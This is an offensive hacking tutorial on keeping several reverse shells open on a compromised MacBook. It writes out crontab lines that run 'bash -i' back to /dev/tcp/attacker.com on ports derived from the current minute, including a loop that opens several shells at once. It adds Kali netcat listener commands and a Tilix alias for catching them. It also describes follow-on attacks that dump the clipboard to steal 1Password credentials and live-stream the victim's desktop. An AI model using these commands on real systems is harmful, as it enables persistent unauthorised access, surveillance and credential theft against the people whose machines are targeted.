Hacking macOS: How to Spawn Multi-Threaded Netcat Backdoors on a MacBook

An attacker can create three, five, or even ten new Netcat connections to a compromised MacBook with one command. Performing complex post-exploitation attacks might otherwise be difficult from a single shell without this essential trick.

Why Create Multiple Netcat Threads?

With some macOS post-exploitation attacks, more than one shell may be required. Spawning additional Netcat connections from a single backdoor is possible but can be cumbersome and inconvenient. So I came up with a simple solution that relies on the current date to predict the next time and port number the backdoor will use.

• Don't Miss: Getting Started with Hacking macOS Computers

The GIF above demonstrates five Netcat connections being established at the same time. We can see how convenient it is to navigate multiple connections as some basic situational awareness attacks with system_profiler are performed.

The following string is an example of a Bash command, used commonly with crontab to backdoor macOS. It creates a single TCP connection to the attacker's system. It's a well-known method for establishing TCP connections to a Netcat listener and can be embedded into the OS and executed every sixty seconds.

* * * * *    bash -i >& /dev/tcp/attacker.com/8080 0>&1

Crontab will attempt to connect to the attacker's server on port 8080 every time. However, if a connection has already been established, the command will silently fail as the port is occupied. The attacker's remote access is limited to one persistent backdoor with this usage.

The command can be modified to have a dynamic port number, defined by the current minute.

* * * * *    bash -i >& /dev/tcp/attacker.com/$(date +\%M) 0>&1

Notice the date command with the %M option. If the time is 10:15 p.m., port 15 will be used. If the time is 3:42 a.m., port 42 will be used. Whatever the minutes are in the time is what the port would be. This would dramatically reduce the number of port conflicts that occur and allow the attacker to open a new Netcat connection every minute if needed.

Creating Predictive Netcat Listeners

To create a listener for dynamic ports, all an attacker would need to do is look at the current time. If the time were 7:30 p.m., the below command would intercept the next connection.

~$ nc -l -p 31

The next expected connection needs to be utilized as both macOS and Kali may use the same time. Meaning, Kali could miss the connection just milliseconds too late. The listener and connection can't be established simultaneously. Kali needs to be predictive, waiting for the next connection attempt.

To automate the process a bit, date can also be used in Kali with sixty seconds added.

~$ nc -l -p $(date +%M --date "+60 seconds")

Creating Multiple Concurrent Connections

It seemed logical to take it up a notch and have the backdoor create multiple connections at once. The following for loop is a simple example of how this can be accomplished.

* * * * *   for i in {1..3};do bash -i >& /dev/tcp/attacker.com/$i$(date +\%M) 0>&1 & done

The for loop will execute the bash command three times ({1..3}). Three connections attempts every sixty seconds creates a lot of noise on the network but will work for demonstration purposes. Any more attempts per minute is probably overkill. The variable $i is prepended to the minute and used as the port number.

If the current time is 5:45 a.m., three connections will be made with the ports 145, 245, and 345.

Creating three predictive Netcat listeners is tricky. Generally, Tilix is my preferred terminal multiplexer as it allows multiple shells within a single window (shown below). It features the ability to automatically split (-a) the window in half while executing (-e) a command.

Tilix can be installed in Kali with the following command.

~$ sudo apt update && sudo apt install tilix

 Hit:1 http://dl.google.com/linux/chrome/deb stable InRelease
Hit:3 http://kali.download/kali kali-rolling InRelease
Ign:2 https://dl.bintray.com/etcher/debian stable InRelease
Err:4 https://dl.bintray.com/etcher/debian stable Release
  403  Forbidden [IP: 54.148.239.199 443]
Reading package lists... Done

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix-common
Suggested packages:
  python-nautilus
The following NEW packages will be installed:
  libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix tilix-common
0 upgraded, 5 newly installed, 0 to remove and 857 not upgraded.
Need to get 4,053 kB of archives.
After this operation, 25.2 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 libphobos2-ldc-shared91 amd64 1:1.21.0-1+b1 [1,265 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libgtkd-3-0 amd64 3.9.0-3+b3 [1,892 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 libvted-3-0 amd64 3.9.0-3+b3 [86.1 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 tilix-common all 1.9.3-4 [211 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 tilix amd64 1.9.3-4+b2 [599 kB]
Fetched 4,053 kB in 1s (3,717 kB/s)
Selecting previously unselected package libphobos2-ldc-shared91:amd64.
(Reading database ... 377083 files and directories currently installed.)
Preparing to unpack .../libphobos2-ldc-shared91_1%3a1.21.0-1+b1_amd64.deb ...
Unpacking libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
Selecting previously unselected package libgtkd-3-0.
Preparing to unpack .../libgtkd-3-0_3.9.0-3+b3_amd64.deb ...
Unpacking libgtkd-3-0 (3.9.0-3+b3) ...
Selecting previously unselected package libvted-3-0.
Preparing to unpack .../libvted-3-0_3.9.0-3+b3_amd64.deb ...
Unpacking libvted-3-0 (3.9.0-3+b3) ...
Selecting previously unselected package tilix-common.
Preparing to unpack .../tilix-common_1.9.3-4_all.deb ...
Unpacking tilix-common (1.9.3-4) ...
Selecting previously unselected package tilix.
Preparing to unpack .../tilix_1.9.3-4+b2_amd64.deb ...
Unpacking tilix (1.9.3-4+b2) ...
Setting up tilix-common (1.9.3-4) ...
Setting up libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
Setting up libvted-3-0 (3.9.0-3+b3) ...
Setting up libgtkd-3-0 (3.9.0-3+b3) ...
Setting up tilix (1.9.3-4+b2) ...
Processing triggers for desktop-file-utils (0.24-1) ...
Processing triggers for mime-support (3.64) ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
Processing triggers for gnome-menus (3.36.0-1) ...
Processing triggers for libglib2.0-0:amd64 (2.64.2-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

In the earlier GIF, the "hacker" command was used to spawn five Netcat listeners automatically. That was accomplished by using Bash aliases. The alias performs the following command.

hacker ()
{
    for i in {1..3};
    do
        tilix -a session-add-down -e "nc -l -p $i$(date +%M --date "+60 seconds")";
    done
}

In Kali, a for loop with the date command is used as well to generate Netcat listeners. The --date "+60 seconds" option has also been added, which takes the current time and adds sixty seconds. This ensures the listeners don't miss the next crontab interval.

To create aliases, open the /root/.bash_aliases file with nano and add the above function. Then, use Control-X to quit, hit Enter, then save it with Y. If you didn't already have the file, it will create it for you.

~$ sudo nano /root/.bash_aliases

Below is a GIF of multiple shells being used in a more realistic scenario.

Two separate attacks occur in that GIF. There's clipboard dumping to steal 1Password credentials and desktop live streaming to gather intelligence about the target's online behavior. The activity, in order from the top shell to bottom, is:

1. Prepares an FFmpeg listener to intercept video streams from the compromised MacBook.
2. The pbpaste command is utilized to dump the MacBook's clipboard every five seconds. 1Password credentials are captured in the process and saved to the /tmp/clipboard.txt file.
3. Downloads FFmpeg onto the MacBook and streams the desktop.
4. This connection is mostly unutilized during the attacks. It's used toward the end to read the /tmp/clipboard.txt file and learn the username and password.
5. MPV plays the video sent from the MacBook, enabling the attacker to see the target browse the web and login to a WonderHowTo account with the help of 1Password.

What took two minutes to accomplish might've taken longer had the attacker not set up a multi-threaded backdoor. Multiple connections are essential when performing various attacks.

Final Thoughts

All of these examples involve crontab executing an arbitrary command every sixty seconds. Realistically, executions might occur once an hour or fifth-hour to minimize the amount of traffic originating from the MacBook. Still, all of the predictive examples can be applied to hourly or daily cronjobs.

The possibilities don't end here. While this article target is macOS, similar multi-threaded connections can be configured and automated with PowerShell payloads in Windows 10.

Keep in mind that established Netcat connections are already easy to spot by automated detection systems. Multiple connections are best utilized in low-security environments for that reason. Too many Netcat threads may also cause the target computer to experience a slower internet connection or heat up. Be mindful of how much data each connection creates as it may ruin the attack.